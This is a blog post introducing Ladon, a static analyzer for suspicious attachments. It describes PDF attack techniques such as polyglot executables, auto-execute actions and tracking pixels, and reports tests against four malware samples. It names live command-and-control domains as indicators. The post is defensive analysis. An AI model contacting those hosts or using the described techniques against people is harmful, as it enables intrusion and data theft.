The Attachment Is the Blind Spot
The executive has a flight tomorrow. Their assistant is coordinating — the calendar, the hotel confirmation, the travel itinerary. A PDF arrives from what looks like the airline: a boarding pass, an e-ticket update, a gate change. The assistant opens it. Nothing visible happens. But somewhere between the travel agency, the booking platform, and the inbox, someone intercepted that file and replaced the QR code with one that points somewhere else entirely. Or embedded a tracking pixel that phoned home the moment the document rendered, leaking the executive's corporate email, device fingerprint, and exact timestamp to an attacker who now knows the travel schedule, the destination, and that someone just opened a document on the corporate network.
The assistant is not careless. They are doing exactly what they were hired to do. The file looked right. The sender looked right. Nobody told them what to look for inside the attachment — because until now, there was no tool that made that check possible for a non-technical person.
A subcontractor at a defense firm gets a PDF. It's an invoice from a vendor they've worked with before. The email passes their spam filter. The attachment passes their antivirus scan. They open it. Nothing visible happens. But the moment that PDF renders in their reader, it phones home — leaking their IP address, operating system, and an exact timestamp to whoever sent it. And that's the benign version of the story.
The more dangerous version: the PDF contains an embedded Windows executable hidden at offset 36,700 bytes — past where any signature scanner checks — wrapped in a file structure that looks completely legitimate. The payload sits dormant until a user clicks, or auto-executes the moment the document opens via a PDF /AA action flag. The employee never knew. The antivirus never flagged it. The email security platform analyzed the email. Nobody analyzed what was inside the attachment.
This is the gap that Ladon was built to close.
The pattern keeps showing up: In my analysis of the TeamPCP supply chain attack — The Trusted Channel — the final payload was hidden inside WAV audio files fetched live from a command-and-control server, extracted in memory, and executed silently. No executable written to disk. No recognizable file. The same principle applies to documents: the threat is never where you think to look. It is always inside something that is trusted by default.
Email security platforms do excellent work analyzing the email envelope — headers, sender reputation, link analysis. The attachment is treated as a black box. A PDF that passes basic type-checking gets delivered. What lives inside that PDF — auto-executing JavaScript, a tracking pixel, a QR code pointing to a typosquatted domain, an embedded executable — is rarely analyzed at the point of delivery. That is not a gap in a specific product. It is a structural gap in how document security is approached across the industry.
The Idea Came From Reading
The idea did not start with a tool. It started with reading.
I read threat intelligence the way some people read the news — continuously, as a habit built from genuine curiosity about how attacks work and why defenses fail. When a new attack surfaces, my brain doesn't stop at "that's interesting." It immediately asks three questions: how did this happen, why did existing defenses miss it, and what would it take to prevent it.
The pattern that led to Ladon was not a single attack — it was the accumulation of several. Supply chain attacks embedding malware in WAV audio files. Boarding pass QR codes replaced with credential harvesting links. Calendar invites bypassing email security filters entirely because .ics files are auto-added to Outlook and Google Calendar regardless of whether the original email was quarantined. PDF tracking pixels that phone home the moment a document is opened, leaking the recipient's IP address, operating system, and exact timestamp before they read a single word.
Each of these attack vectors shared something in common — they exploited the implicit trust users place in documents that look legitimate. A boarding pass is a boarding pass. A calendar invite from IT is from IT. A PDF invoice from a vendor is from a vendor. The malicious content is invisible to the eye and, critically, invisible to most security tools that analyze the email itself rather than what is embedded inside the attachments.
The question that crystallized the idea was simple: what if anyone could drag and drop a suspicious attachment into a tool and get a plain-English explanation of exactly what is suspicious about it and why it matters — before opening it? Not a cryptic hash match or a vendor confidence score, but a real explanation that teaches the user something about how the attack works.
That question became Ladon.
On the name: In Greek mythology, Ladon was the hundred-headed serpent that never slept, assigned by Hera to guard the golden apples in the Garden of the Hesperides. It watched every angle simultaneously, never rested, and never missed a threat. The metaphor felt right for a tool designed to examine every attack surface in a document at once — PDF structure, embedded images, audio steganography, barcodes, calendar links — not just one thing, but all of them, simultaneously.
What Ladon Does, in Plain English
Ladon is a static document security analyzer. You drag in a file — a PDF, an email, an image, a calendar invite, an audio file — and it tells you what's suspicious about it before you open it. It supports PDF, EML, ICS, JPG, PNG, GIF, BMP, WEBP, ICO, SVG, WAV, and MP3.
The word static is doing real work in that description. Ladon never executes the file. It reads the raw bytes and analyzes their structure, the same way a forensic investigator examines evidence without touching it. The malware has no idea it is being read. It cannot execute because nothing is interpreting it as a document — it is just data. This is not a minor technical detail. It is the core security guarantee that makes the tool safe to use on genuinely malicious files.
The educational layer was intentional from the start. Security awareness training teaches people to be suspicious of unexpected attachments. It rarely explains the mechanics — what a tracking pixel actually does, why a QR code in a boarding pass can be dangerous, how data can be hidden in an image that looks completely normal. Every Ladon finding comes with a plain-English explanation of the technique, why it matters, and what an attacker gains from it.
Four Real Samples. Zero Misses.
Synthetic test files built to fire detection rules are a starting point — they prove the code runs, not that the tool works. Real validation requires real malware. On April 3, 2026, after installing a FlareVM malware analysis environment in an isolated Windows 11 virtual machine with Windows Defender disabled, I downloaded four confirmed malicious PDF samples from MalwareBazaar and uploaded each one to Ladon.
All four were detected. No false negatives. No crashes. No execution.
| Sample | Family / Origin | Severity | Key Findings |
|---|---|---|---|
| Unknown PDF dropper d67e62bb... · 293 KB |
Unknown · MalwareBazaar 2026-03-31 | HIGH | Polyglot: Windows PE signature inside PDF · /ObjStm stream (object hiding) |
| Shui Wu Chou Cha She Shui Qi Ye Ming Dan e2b75baeb... · 158 KB |
ValleyRAT / SilverFox · Chinese APT · 2026-03-13 | CRITICAL | Polyglot: PE signature inside PDF · 20× external URI · 13 suspicious URLs · Live C2 — cos.ap-guangzhou.myqcloud.com |
| Facebook Account Recovery Support Center 2026 b046d04b... · 135 KB |
Phishing · Social engineering · 2026-01-09 | CRITICAL | Polyglot: PE signature inside PDF · Auto-execute on open (6×) · 4× external URI · C2 — maneger-accountr-solutieonst.site |
| consider(15).pdf 5095c647... · 155 KB |
Gamaredon APT · Russian state-affiliated · 2025-11-24 | HIGH | Polyglot: PE signature inside PDF · VBA macro content · PDF structure otherwise clean (sophisticated evasion) |
The Findings, One by One
Every sample was a polyglot
All four samples contained a Windows PE executable hidden inside the PDF file body — past the point where most signature scanners check. This is not a coincidence. Polyglot files are a deliberate evasion technique. A tool that checks the first few bytes sees a valid PDF header and stops. Ladon reads the entire file.
ValleyRAT: a live C2 URL baked into the PDF structure
The ValleyRAT sample — delivered with a Chinese-language filename targeting Chinese-speaking businesses — embedded 20 external URI references and 13 suspicious URLs pointing to Chinese cloud infrastructure being abused as command-and-control. These URLs would be fetched automatically when the PDF renders — no user click required — delivering a secondary payload. The repetition of the same C2 domain across thirteen URLs is itself a ValleyRAT technique: embed enough copies that at least one resolves even if some are taken down.
The Facebook phishing PDF: auto-execute on open
The most technically aggressive sample was disguised as a Facebook account recovery notice. Beyond the embedded executable, Ladon detected auto-execute actions — a PDF capability that triggers code execution the moment the document renders. No macro to enable. No button to click. Simply opening the file in a PDF reader is enough. This is the attack that ends careers and fails CMMC audits: an employee receives what looks like an official communication, opens it following normal procedure, and the payload runs before they finish reading the first sentence.
Auto-execute in practice: The PDF specification includes legitimate mechanisms for triggering actions when a document opens — designed for form submission, accessibility features, and similar use cases. Attackers abuse these same mechanisms to execute malicious code on document open. The finding does not require the user to do anything wrong. Opening the file is the trigger.
Gamaredon: sophisticated evasion, still caught
The most interesting result was the Gamaredon sample. Gamaredon — also known as Primitive Bear, Shuckworm, or Aqua Blizzard — is a Russian FSB-attributed APT group active since at least 2013, primarily targeting Ukrainian government and military institutions with documented expansion toward NATO-aligned organizations. The security community has long debated how to characterize them: ESET describes them as "known for their unsophisticated and noisy approach" — yet ESET's own July 2025 research shows the group has notably adapted, with new tools designed primarily for stealth. HarfangLab notes they are as active as ever but receive little in-depth coverage, with their ability to consistently evade detection making them a persistent threat.
What Ladon's result adds to that debate: the sophistication question is the wrong frame. Their sample was deliberately constructed to be clean at the PDF structure layer — no auto-execute flags, no hidden object streams, no external URI references. A tool that stopped at document structure analysis would have cleared this file as safe. Ladon caught it anyway, because polyglot detection does not depend on what the document structure claims. It reads the entire file independently. The embedded executable cannot hide from that check regardless of how clean the wrapper looks — or how the security community classifies the group that built it.
That is the architectural decision that matters. Defense in depth at the file level, not just at one layer.
The Contractor Who Opens the PDF
Defense contractors are not the primary target of most of these campaigns. They are a target of opportunity — organizations that handle Controlled Unclassified Information, that often lack dedicated security teams, and that receive documents from dozens of vendors, subcontractors, and government offices every day. The attack surface is the inbox. The vector is the PDF.
The ValleyRAT and Gamaredon families both have documented histories targeting organizations connected to defense supply chains. Gamaredon has been active since at least 2013, attributed to Russia's Federal Security Service, and has been observed specifically targeting defense industrial organizations in Eastern Europe and NATO member states. A contractor in Connecticut receiving a PDF from an unfamiliar sender is not paranoid to be cautious. They are operating in an environment where nation-state actors have explicitly demonstrated interest in exactly that attack vector.
The CMMC context: Phase 1 enforcement has been active since November 10, 2025. Phase 2 mandatory third-party certification begins November 2026. Only 1% of contractors are currently audit-ready — down from 8% in 2023. There are 350,000 contractors requiring certification and only 600 certified assessors. In that environment, a single successful document-based attack that results in a data breach is not just a security incident. It is a contract-ending event. [Full CMMC Supply Chain Analysis →]
Ladon is not a replacement for endpoint security or email gateways. It is the triage layer that exists before those tools are relevant — the thing you use when a file arrives and you need to know, before you open it, whether it is safe. For a CMMC-compliant organization, having a documented triage process for suspicious attachments is not just good hygiene. It maps directly to control requirements.
SI.1.210 Malicious code protection. Identify, report, and correct information and information system flaws — including those introduced through malicious attachments. Static triage analysis before opening a file directly supports this control.
SI.2.214 Security alerts and advisories. Monitor system security alerts and take action in response to malicious code. Ladon's plain-English findings give non-technical employees actionable, documented evidence to escalate.
AT.2.056 Security awareness training. Ensure personnel are aware of security risks associated with their activities. Using Ladon in a facilitated session — running real suspicious files and explaining findings — creates a documented, role-relevant training record that satisfies this control.
SC.1.175 Boundary protection. Monitor, control, and protect communications at external boundaries. Document triage is a boundary protection activity — analyzing what crosses the perimeter before it is introduced into the environment.
The Tool Is the Proof of Concept
Ladon is a portfolio piece today. The goal is for it to become infrastructure.
The manual triage workflow — drag a file, get a plain-English report — is the starting point. April 3, 2026 proved it works on real malware from real threat actors. The methodology is validated. What comes next is a larger problem: the gap is not just in manual triage, it is in the moment before an employee ever sees the file. That is the problem worth solving.
For CMMC-compliant defense contractors specifically, a pre-delivery document scanner that produces structured findings, maps to NIST controls, and generates audit-ready logs addresses a compliance gap that no existing consumer-grade tool fills. The market exists. The methodology is validated. The next step is the integration layer.
Currently in private testing. Ladon is being validated with real malware samples before public release. If you are a defense contractor, CMMC consultant, or security team lead interested in early access or want to discuss how document triage fits into your compliance workflow, reach out via the portfolio.
The detection methodology that powers Ladon builds on the same analytical foundation as my other published work — including the Glassworm homoglyph detection rule submitted to Sublime Security's community rule feed. Each piece of work is a layer in the same argument: the threats are in the details nobody is checking, and the tools to check them can be built.
Sources
| Source | Relevance | Link |
|---|---|---|
| MalwareBazaar — abuse.ch | All four malware samples used in validation | bazaar.abuse.ch |
| MITRE ATT&CK — Gamaredon | Russian FSB-attributed APT · Active since 2013 · NATO targeting | attack.mitre.org/groups/G0047 |
| TeamPCP / Telnyx Supply Chain Analysis | WAV steganography in supply chain attack — same technique Ladon detects | The Trusted Channel → |
| CMMC Supply Chain Analysis — Yana Ivanov, 2026 | 1% audit-ready · 350K contractors · 600 assessors · 18-month wait times | CMMC Supply Chain Analysis → |
| NIST SP 800-171 Rev 3 | Control mappings — SI.1.210, SI.2.214, AT.2.056, SC.1.175 | csrc.nist.gov |
| DoD CIO — CMMC Program | Phase 1 enforcement active November 10, 2025 · Phase 2 begins November 2026 | dodcio.defense.gov/CMMC |
| Sublime Security — PR #4267 | Glassworm invisible Unicode detection rule — community rule feed submission | sublime-rules/pull/4267 |
| Mandiant FlareVM | Malware analysis environment used for isolated testing | github.com/mandiant/flare-vm |
| ESET Research — Gamaredon 2024 White Paper | "Known for unsophisticated and noisy approach" — yet evolving stealth capabilities | eset.com · July 2025 |
| HarfangLab — Cyber Threat Research 2025 | Gamaredon active as ever, little in-depth coverage, consistently evades detection | harfanglab.io · December 2025 |